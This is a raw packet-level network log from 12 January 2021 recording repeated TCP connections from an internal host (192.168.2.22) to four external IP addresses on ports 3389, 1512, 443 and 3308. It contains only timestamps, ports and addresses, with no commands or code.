Jan 12, 2021 07:40:16.924798012 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.925290108 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.926847935 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.928139925 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.928199053 CET	49209	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.978760958 CET	3389	49209	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.981163979 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:16.981235981 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:16.982404947 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.036488056 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.058583975 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.058635950 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.058722973 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.058757067 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.073806047 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.135768890 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.136049032 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.143771887 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.143903971 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.198326111 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.198635101 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.237529039 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.252871990 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.252944946 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.344333887 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.344384909 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.344682932 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.344822884 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.347717047 CET	49210	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:17.401995897 CET	3389	49210	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:17.462966919 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.516144037 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.516443968 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.517940998 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.570977926 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.578192949 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.578223944 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.578304052 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.585587978 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.639899015 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.640122890 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.646374941 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.646584988 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.699517012 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.699805021 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.737380981 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.752890110 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.853292942 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.853317976 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.853638887 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.856662035 CET	49211	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:17.909625053 CET	1512	49211	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:17.976933002 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.029186010 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.029416084 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.030951023 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.082988977 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.097915888 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.098028898 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.110414028 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.164897919 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.165138006 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.170994043 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.171047926 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.223093987 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.223304033 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.275430918 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.394556046 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.394578934 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.394670010 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.397604942 CET	49212	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:18.449642897 CET	443	49212	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:18.504112005 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.547286034 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.547440052 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.548691034 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.591751099 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.603746891 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.603770971 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.603950977 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.618437052 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.663264990 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.663518906 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.673280001 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.673675060 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.716809988 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.717086077 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.760126114 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.873766899 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.873789072 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.873872042 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.873913050 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.879472017 CET	49213	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:18.923813105 CET	3308	49213	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:18.987894058 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.041697979 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.041830063 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.042828083 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.096775055 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.114602089 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.114626884 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.114806890 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.123609066 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.185270071 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.185563087 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.191199064 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.191312075 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.245048046 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.245428085 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.284497976 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.299242973 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.299263954 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.389429092 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.389450073 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.389738083 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.389838934 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.392709017 CET	49214	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:19.446378946 CET	3389	49214	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:19.516062021 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.568911076 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.569120884 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.570194006 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.622996092 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.629869938 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.629893064 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.630099058 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.640130043 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.694081068 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.694310904 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.700017929 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.700200081 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.753079891 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.753328085 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.792814016 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.806324959 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.907923937 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.907962084 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:19.908283949 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.911533117 CET	49215	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:19.964359045 CET	1512	49215	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:20.018846989 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.070940018 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.071247101 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.072298050 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.123959064 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.146485090 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.146634102 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.164715052 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.218735933 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.218960047 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.228734970 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.229054928 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.280941010 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.281220913 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.332947969 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.451904058 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.451931000 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.452393055 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.457993031 CET	49216	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:20.509752989 CET	443	49216	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:20.567758083 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.610855103 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.610990047 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.612821102 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.655728102 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.671721935 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.671742916 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.671817064 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.687933922 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.733340979 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.733510971 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.742999077 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.743283033 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.786293030 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.786459923 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.827050924 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.829458952 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.829477072 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.942563057 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.942606926 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:20.942842960 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.945930004 CET	49217	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:20.989259005 CET	3308	49217	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:21.063980103 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.118029118 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.118139029 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.118983030 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.172844887 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.196018934 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.196072102 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.196152925 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.204804897 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.268299103 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.268364906 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.273912907 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.274051905 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.329807997 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.329896927 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.369435072 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.384052038 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.384083986 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.474965096 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.475012064 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.475249052 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.475294113 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.478142023 CET	49218	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:21.532279968 CET	3389	49218	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:21.594717979 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.647739887 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.647840977 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.649171114 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.701988935 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.708762884 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.708782911 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.709026098 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.725636005 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.779717922 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.779818058 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.786241055 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.786406040 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.839257002 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.839430094 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:21.877104044 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.892431974 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.996510983 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.996542931 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:21.996757030 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:22.002340078 CET	49219	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:22.055593014 CET	1512	49219	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:22.113806009 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.165956020 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.166166067 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.167692900 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.219568968 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.234646082 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.234786987 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.251084089 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.305596113 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.305871010 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.316997051 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.317435980 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.369338036 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.369540930 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.406889915 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.421586990 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.539570093 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.539607048 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.539791107 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.542757034 CET	49220	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:22.594764948 CET	443	49220	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:22.654706955 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.698170900 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.698412895 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.699683905 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.742794991 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.753345013 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.753377914 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.753477097 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.753525972 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.765187025 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.810117006 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.810353994 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.815140009 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.815258026 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.858417988 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.858714104 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:22.898264885 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:22.902266979 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:23.016827106 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:23.016891003 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:23.017131090 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:23.022907972 CET	49221	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:40:23.066206932 CET	3308	49221	80.86.91.27	192.168.2.22
Jan 12, 2021 07:40:23.147135019 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.201764107 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.201951027 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.203321934 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.264730930 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.278831005 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.278861046 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.278956890 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.292190075 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.354002953 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.354357958 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.360268116 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.360380888 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.414230108 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.414426088 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.457307100 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.470454931 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.470478058 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.559334040 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.559357882 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.559428930 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.559474945 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.562865973 CET	49222	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:40:23.617182016 CET	3389	49222	5.100.228.233	192.168.2.22
Jan 12, 2021 07:40:23.669435024 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.724436998 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.724520922 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.725440025 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.778568983 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.785351992 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.785403013 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.785525084 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.797312021 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.851588964 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.851778030 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.857525110 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.857728958 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.910886049 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.911148071 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:23.949157000 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.964406013 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:23.964468002 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:24.061712980 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:24.061758041 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:24.061939001 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:24.064429045 CET	49223	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:40:24.117501020 CET	1512	49223	46.105.131.65	192.168.2.22
Jan 12, 2021 07:40:24.168066978 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.220215082 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.220302105 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.221185923 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.273178101 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.288883924 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.288990021 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.300906897 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.355515003 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.355743885 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.364129066 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.364311934 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.416313887 CET	443	49224	77.220.64.37	192.168.2.22
Jan 12, 2021 07:40:24.416493893 CET	49224	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:40:24.468622923 CET	443	49224	77.220.64.37	192.168.2.22
